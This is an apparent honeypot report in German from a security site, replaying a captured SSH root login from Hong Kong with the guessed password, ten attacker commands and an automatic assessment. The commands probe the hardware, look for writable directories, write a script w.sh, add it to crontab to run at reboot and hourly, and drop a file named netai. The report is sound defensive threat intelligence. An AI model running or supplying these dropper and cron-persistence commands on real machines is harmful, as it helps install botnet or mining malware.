ALLSmartSecurity
Mitschnitt

SSH-Angriff aus HK: Hardware ausspähen und Einnisten per Cronjob

05.10.2026, 17:52 UTC · 10 Befehle · über ssh · HK

Überblick

Dienst
ssh (Port 22)
Herkunft
HK · UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED
Probierte Zugangsdaten
root / RUR_gPlzn@R+cJT

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
root@srv01: ~

root@srv01:~$ uname -a
Linux app-prod 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 GNU/Linux
root@srv01:~$ sh -c 'for d in /dev/shm /tmp /var/run /mnt /root /; do cd "$d" 2>/dev/null && pwd && break; done'
/
root@srv01:~$ cat /proc/cpuinfo | grep processor | wc -l
8
root@srv01:~$ cd "/" && if [ ! -f "w.sh" ]; then cat > "w.sh" && chmod +x w.sh; fi
bash: w.sh: No such file or directory
root@srv01:~$ CRON="$(crontab -l 2>/dev/null || true)"
root@srv01:~$ echo "$CRON" | grep -F '//w.sh "astats" "netai" "kstats" "ssh 2 az"' >/dev/null 2>&1 || \
bash: syntax error near unexpected token `|'
root@srv01:~$ printf '%s\n%s\n' "@reboot  //w.sh "astats" "netai" "kstats" "ssh 2 az"" "0 * * * * cd "/" && ./w.sh "astats" "netai" "kstats" "ssh 2 az"" | (cat -; echo "$CRON") | crontab -
bash: syntax error near unexpected token `('
root@srv01:~$ ps -eo pid,pcpu,comm --sort=-pcpu | head -n 10
PID %CPU COMM
  1234  2.3 python3
  1098  1.1 nginx
   876  0.5 sshd
   654  0.3 systemd-journal
   432  0.2 systemd-udevd
   321  0.1 cron
   210  0.1 rsyslogd
   198  0.0 systemd-logind
   176  0.0 dbus-daemon
   154  0.0 systemd
root@srv01:~$ ps aux | grep netai | grep -v grep | wc -l
0
root@srv01:~$ cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > netai
bash: netai: No such file or directory

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer meldete sich über SSH mit dem Benutzer root und einem erratenen Passwort an. Er prüfte zunächst die Systemumgebung und die Anzahl der Prozessoren. Anschließend versuchte er, ein Skript namens w.sh im Wurzelverzeichnis zu erstellen und dieses über die Cron-Tabelle regelmäßig ausführen zu lassen. Zuletzt versuchte er, eine Datei namens netai in einem temporären Verzeichnis abzulegen, was jedoch an Syntaxfehlern scheiterte.

Was die Befehle bewirken

Die Befehle uname und cat /proc/cpuinfo dienten der Erkennung der Systemarchitektur und der CPU-Kerne. Die Schleife mit cd prüfte, ob der Angreifer Schreibrechte in verschiedenen Verzeichnissen wie /dev/shm oder /tmp hatte. Der Befehl cat > w.sh versuchte, ein Shell-Skript zu schreiben, während crontab die automatische Ausführung beim Systemstart und stündlich einrichten sollte. Die ps-Befehle dienten der Überwachung laufender Prozesse, um sicherzustellen, dass die Malware nicht bereits aktiv war oder um Ressourcen zu prüfen.

Worauf es hinauslief

Das Ziel war vermutlich die Installation eines Botnetzes oder Kryptominers, erkennbar an den Namen netai und kstats sowie der Cron-Einrichtung für einen Neustart. Die Verwendung von /dev/shm deutet auf das Verstecken von Malware im Arbeitsspeicher hin, um die Entdeckung durch Festplatten-Scans zu erschweren. Da die Befehle fehlschlugen, blieb die Infektion in diesem Fall aus.

Einordnung

Dieses Vorgehen ist ein sehr verbreitetes Muster bei automatisierten Botnet-Angriffen, die oft auf schwache Passwörter setzen. Die spezifischen Dateinamen deuten auf bekannte Malware-Familien hin, die häufig in der Wildbahn anzutreffen sind.